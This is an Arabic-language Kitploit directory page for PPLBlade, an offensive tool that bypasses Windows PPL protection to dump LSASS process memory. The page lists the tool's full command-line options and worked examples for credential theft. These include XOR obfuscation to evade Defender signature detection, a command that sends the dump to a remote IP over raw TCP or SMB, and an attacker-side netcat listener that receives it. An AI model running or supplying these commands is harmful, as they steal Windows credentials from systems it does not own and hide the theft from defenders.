Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
PPLBlade — يتجاوز حماية PPL لتفريغ ذاكرة عملية LSASS، ويُعمّي ملفات التفريغ باستخدام XOR، ويُسرّبها عن بُعد عبر RAW أو SMB دون الكتابة على القرص. | Kitploit
أدوات/GitHubGitHub/tastypepperoni/pplblade
تصعيد الامتيازاتتحليل الذاكرة الجنائيالاستغلالتسريب البياناتما بعد الاستغلال
GitHubtastypepperoni/pplblade

PPLBlade

يتجاوز حماية PPL لتفريغ ذاكرة عملية LSASS، ويُعمّي ملفات التفريغ باستخدام XOR، ويُسرّبها عن بُعد عبر RAW أو SMB دون الكتابة على القرص.

عرض المستودع
597635منذ 3 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

PPLBlade

أداة تفريغ العمليات المحمية تدعم إخفاء تفريغ الذاكرة ونقله إلى محطات العمل البعيدة دون إسقاطه على القرص.

الوظائف الرئيسية:

  1. تجاوز حماية PPL
  2. إخفاء ملفات تفريغ الذاكرة للتهرب من آليات الكشف القائمة على التوقيع في Defender
  3. رفع تفريغ الذاكرة باستخدام طرق الرفع RAW و SMB دون إسقاطه على القرص (تفريغ بدون ملفات)

نظرة عامة على التقنيات المستخدمة في هذه الأداة يمكن العثور عليها هنا: https://tastypepperoni.medium.com/bypassing-defenders-lsass-dump-detection-and-ppl-protection-in-go-7dd85d9a32e6

لاحظ أن PROCEXP15.SYS مدرج في ملفات المصدر لأغراض التجميع. لا يحتاج إلى نقله إلى الجهاز المستهدف بجانب PPLBlade.exe.

إنه مضمن بالفعل في PPLBlade.exe. الاستغلال هو مجرد ملف تنفيذي واحد.

الأوضاع:

  1. تفريغ - تفريغ ذاكرة العملية باستخدام PID أو اسم العملية
  2. فك التشفير - إعادة ملف التفريغ المخفي (--obfuscate) إلى حالته الأصلية
  3. تنظيف - القيام بالتنظيف يدويًا، في حالة حدوث خطأ أثناء التنفيذ (لاحظ أن قيم الخيارات يجب أن تكون مماثلة لتنفيذ العملية التي نحاول تنظيفها)
  4. DoThatLsassThing - تفريغ lsass.exe باستخدام برنامج تشغيل Process Explorer (إثبات مفهوم أساسي)

أوضاع المقبض:

  1. مباشر - يفتح مقبض PROCESS_ALL_ACCESS مباشرة باستخدام دالة OpenProcess()
  2. Procexp - يستخدم PROCEXP152.sys للحصول على مقبض
root@kitploit:~
Usage of PPLBlade.exe:
  -driver string
        Path where the driver file will be dropped (default: current directory)
  -dumpmode string
        Dump mode [local|network] (default "local")
  -dumpname string
        Name of the dump file (default "PPLBlade.dmp")
  -handle string
        Method to obtain target process handle [direct|procexp] (default "direct")
  -help
        Prints this help message
  -ip string
        IP of the remote server
  -key string
        XOR Key for obfuscation (default "PPLBlade")
  -mode string
        Kill or Dump process [dump|decrypt|cleanup|dothatlsassthing] (default "dump")
  -name string
        Process name of target process
  -network string
        Method for network transfer[raw|smb] (default "raw")
  -obfuscate
        Obfuscate dump file
  -pass string
        SMB password
  -pid int
        PID of target process (prioritized over process name)
  -port int
        PORT on the remote server
  -quiet
        Quiet mode
  -service string
        Name of the service (default "PPLBlade")
  -share string
        share name
  -user string
        SMB username

Examples:
PPLBlade.exe --mode dothatlsassthing
PPLBlade.exe --mode dump --name lsass.exe --handle procexp --obfuscate --dumpmode network --network raw --ip 192.168.1.17 --port 1234
PPLBlade.exe --mode decrypt --dumpname PPLBlade.dmp --key PPLBlade
PPLBlade.exe --mode cleanup

أمثلة:

إثبات مفهوم أساسي يستخدم PROCEXP152.sys لتفريغ lsass:

root@kitploit:~
PPLBlade.exe --mode dothatlsassthing

(لاحظ أنه لا يقوم بعملية XOR على ملف التفريغ، قم بتوفير علامة obfuscate إضافية لتمكين وظيفة XOR)

رفع تفريغ LSASS المخفي إلى موقع بعيد:

root@kitploit:~
PPLBlade.exe --mode dump --name lsass.exe --handle procexp --obfuscate --dumpmode network --network raw --ip 192.168.1.17 --port 1234

المضيف المهاجم:

root@kitploit:~
nc -lnp 1234 > lsass.dmp
python3 deobfuscate.py --dumpname lsass.dmp

إزالة إخفاء تفريغ الذاكرة:

root@kitploit:~
PPLBlade.exe --mode descrypt --dumpname PPLBlade.dmp --key PPLBlade
تنزيل الأداة